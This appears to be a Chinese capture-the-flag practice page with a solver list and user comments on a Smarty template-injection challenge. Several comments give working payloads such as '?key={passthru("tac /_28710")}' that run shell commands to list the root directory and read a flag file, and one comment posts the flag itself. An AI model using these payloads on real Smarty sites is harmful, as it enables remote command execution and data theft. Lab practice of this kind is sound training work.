评分(13)
解题动态

huaier0000007 攻破了该题 1天前

jackC 攻破了该题 1天前

dangfanchima 攻破了该题 2天前

NosajUx 攻破了该题 4天前

贺淑敏 攻破了该题 9天前

Lidisheng2027 攻破了该题 9天前

大棕兔爸爸 攻破了该题 10天前

嗨客111 攻破了该题 11天前

Hehe0619 攻破了该题 11天前

123456abc 攻破了该题 12天前

souljian03 攻破了该题 13天前

hackerbugku 攻破了该题 13天前

人闲桂花落 攻破了该题 14天前

小白ctf 攻破了该题 17天前

femsq 攻破了该题 18天前

千机www 攻破了该题 20天前

Da1ly_1upup 攻破了该题 22天前

华仔 攻破了该题 24天前

ETERNALBLUE 攻破了该题 24天前

评论
人闲桂花落 14天前
举报
tac命令读取也可
docker0w 10月前
举报
1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获
bx33661 11月前
举报
?key={passthru("tac%20/_28710")}
yun20231227 1年前
举报
?key={{passthru('ls /')}}
xinkuang 1年前
举报
http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}
YUMEKO 1年前
举报
http://xxxxxxx/?key={{passthru('tac ../../../_16018')}} key_16018 别看错了
Daniel2023 1年前
举报
flag{0e54d64e616af92957ddbb6c6ea37c5f}
一路奔腾 1年前
举报
?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120
EtHat 1年前
举报
index.php?a={passthru("tac /_4060")}
FUCK123 1年前
举报
fnmdp
18904484271 1年前
举报
好垃圾的靶场,明明flag出来了,但是提交显示不正确